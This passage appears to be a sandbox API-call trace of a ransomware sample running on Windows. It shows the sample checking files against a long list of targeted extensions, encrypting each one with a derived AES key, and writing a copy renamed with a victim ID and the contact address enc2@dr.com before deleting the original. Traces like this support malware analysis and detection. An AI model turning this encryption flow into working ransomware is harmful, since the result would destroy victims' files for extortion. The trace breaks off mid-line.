	[0183.302] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\ZX28zqUixC5H.odp", cchLength=0x40 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp") returned 0x40
	[0183.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.303] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.303] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp"
	[0183.303] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp") returned 64
	[0183.303] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.304] StrStrW (lpFirst=".odp", lpSrch=".") returned=".odp"
	[0183.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.305] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odp") returned=".odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.305] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.306] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.306] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.312] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x73f6, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x73f6, lpOverlapped=0x0) returned 1
	[0183.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.315] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0183.317] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.317] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.317] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.317] CryptHashData (hHash=0xfb9430, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.317] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.318] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9430, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb94b0) returned 1
	[0183.318] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.318] CryptEncrypt (in: hKey=0xfb94b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x73f6, dwBufLen=0x73f6 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x7400) returned 1
	[0183.319] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.319] RtlMoveMemory (in: Destination=0xfe5588, Source=0xfde188, Length=0x73f6 | out: Destination=0xfe5588) 
	[0183.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.319] CryptEncrypt (in: hKey=0xfb94b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe5588*, pdwDataLen=0x18a1ec*=0x73f6, dwBufLen=0x7400 | out: pbData=0xfe5588*, pdwDataLen=0x18a1ec*=0x7400) returned 1
	[0183.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.322] CryptDestroyKey (hKey=0xfb94b0) returned 1
	[0183.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.322] CryptDestroyHash (hHash=0xfb9430) returned 1
	[0183.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.323] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0183.323] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.323] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.323] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.324] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0183.325] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 106
	[0183.327] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.328] WriteFile (in: hFile=0x39c, lpBuffer=0xfe5588*, nNumberOfBytesToWrite=0x7400, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe5588*, lpNumberOfBytesWritten=0x18a648*=0x7400, lpOverlapped=0x0) returned 1
	[0183.332] CloseHandle (hObject=0x39c) returned 1
	[0183.332] CloseHandle (hObject=0x390) returned 1
	[0183.332] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp")) returned 1
	[0183.339] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\zx28zquixc5h.odp")) returned 0
	[0183.339] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c146a90, ftCreationTime.dwHighDateTime=0x1d971ed, ftLastAccessTime.dwLowDateTime=0xd7d58110, ftLastAccessTime.dwHighDateTime=0x1d97264, ftLastWriteTime.dwLowDateTime=0xd7d58110, ftLastWriteTime.dwHighDateTime=0x1d97264, nFileSizeHigh=0x0, nFileSizeLow=0x909a, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uPlQIqUSdinYdiA4XZ-.mp4", cAlternateFileName="_UPLQI~1.MP4")) returned 1
	[0183.339] lstrcmpW (lpString1="_uPlQIqUSdinYdiA4XZ-.mp4", lpString2="..") returned 1
	[0183.339] lstrcmpW (lpString1="_uPlQIqUSdinYdiA4XZ-.mp4", lpString2=".") returned 1
	[0183.339] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.340] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="_uPlQIqUSdinYdiA4XZ-.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\_uPlQIqUSdinYdiA4XZ-.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\_uPlQIqUSdinYdiA4XZ-.mp4"
	[0183.340] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\_uPlQIqUSdinYdiA4XZ-.mp4") returned 72
	[0183.340] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.340] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\_uPlQIqUSdinYdiA4XZ-.mp4", cchLength=0x48 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4") returned 0x48
	[0183.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.340] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.340] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4"
	[0183.340] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4") returned 72
	[0183.341] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.341] StrStrW (lpFirst=".mp4", lpSrch=".") returned=".mp4"
	[0183.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.341] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lr